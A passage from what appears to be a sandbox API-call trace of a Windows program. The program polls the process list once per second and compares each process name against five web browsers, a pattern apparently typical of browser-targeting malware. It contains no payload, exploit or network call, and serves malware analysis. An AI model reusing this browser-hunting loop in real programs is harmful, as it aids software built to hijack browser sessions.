lpString2="chrome.exe") returned 1 [0181.133] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0181.133] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.133] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0181.134] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0181.134] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0181.134] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0181.134] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0181.134] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.134] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0181.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0181.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0181.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0181.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0181.134] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.134] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0181.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0181.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0181.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0181.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0181.135] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.135] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0181.136] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0181.136] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0181.136] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0181.136] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0181.136] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.136] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0181.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0181.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0181.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0181.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0181.136] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.136] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0181.137] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0181.137] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0181.137] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0181.137] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0181.137] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.137] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0181.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0181.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0181.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0181.137] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.138] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.138] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.138] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.138] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.138] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.138] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.138] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0181.139] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0181.139] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0181.139] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0181.139] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0181.139] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.139] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.139] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.139] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.139] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.139] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.139] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.139] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0181.140] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0181.140] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0181.140] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0181.140] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0181.140] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.140] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0181.140] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0181.140] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0181.141] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0181.141] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0181.141] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.141] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.141] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.141] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.141] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.141] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0181.141] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.141] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0181.142] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0181.142] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0181.142] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0181.142] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0181.142] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0181.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0181.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0181.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0181.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0181.178] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0181.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0181.179] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0181.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0181.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0181.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0181.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0181.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0181.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0181.181] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0181.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0181.181] CloseHandle (hObject=0xe8) returned 1 [0181.182] Sleep (dwMilliseconds=0x3e8) [0182.186] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0182.188] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0182.189] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0182.189] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0182.189] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0182.189] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0182.189] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0182.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0182.189] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0182.189] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0182.189] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0182.189] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0182.189] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0182.189] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0182.190] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0182.190] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0182.190] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0182.190] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0182.190] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.190] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0182.190] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0182.190] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0182.191] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0182.191] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0182.191] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0182.191] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0182.191] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0182.191] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0182.191] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0182.192] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0182.192] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0182.192] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0182.192] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0182.192] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0182.192] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0182.192] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0182.192] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0182.192] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0182.192] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0182.193] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0182.193] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0182.193] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0182.193] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0182.193] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0182.193] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0182.193] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0182.193] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0182.194] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0182.194] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0182.194] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0182.194] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0182.194] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0182.194] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0182.194] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0182.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.195] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.196] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.196] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.196] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.196] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.196] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.196] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.196] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0182.197] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0182.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0182.198] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0182.198] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0182.198] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0182.198] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0182.198] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 